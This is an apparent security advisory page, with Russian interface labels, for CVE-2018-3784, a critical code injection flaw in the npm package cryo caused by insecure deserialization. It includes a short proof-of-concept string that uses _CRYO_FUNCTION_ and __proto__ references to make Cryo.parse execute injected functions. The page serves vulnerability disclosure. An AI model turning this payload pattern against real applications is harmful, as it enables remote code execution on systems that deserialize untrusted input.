exploitDog

GHSA-38f5-ghc2-fcmv

Опубликовано: 21 авг. 2018

Источник: github

Github: Прошло ревью

CVSS3: 9.8

Описание

Code Injection in cryo

All versions of cryo are vulnerable to code injection due to an Insecure implementation of deserialization.

Proof of concept

var Cryo = require('cryo'); var frozen = '{"root":"_CRYO_REF_3","references":[{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\\"defconrussia\\"); return 1111;}"},{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\\"defconrussia\\");return 2222;}"},{"contents":{"toString":"_CRYO_REF_0","valueOf":"_CRYO_REF_1"},"value":"_CRYO_OBJECT_"},{"contents":{"__proto__":"_CRYO_REF_2"},"value":"_CRYO_OBJECT_"}]}' var hydrated = Cryo.parse(frozen); console.log(hydrated);

Recommendation

No fix is currently available. Consider using an alternative module until a fix is made available.

Ссылки

Пакеты

Наименование

cryo

npm

Затронутые версииВерсия исправления

<= 0.0.6

Отсутствует

EPSS

Процентиль: 69%

0.00606

Низкий

9.8 Critical

CVSS3

CVE ID

Дефекты

CWE-94

Связанные уязвимости

CVE-2018-3784

CVSS3: 9.8

nvd

больше 7 лет назад

A code injection in cryo 0.0.6 allows an attacker to arbitrarily execute code due to insecure implementation of deserialization.

EPSS

Процентиль: 69%

0.00606

Низкий

9.8 Critical

CVSS3

CVE ID

Дефекты

CWE-94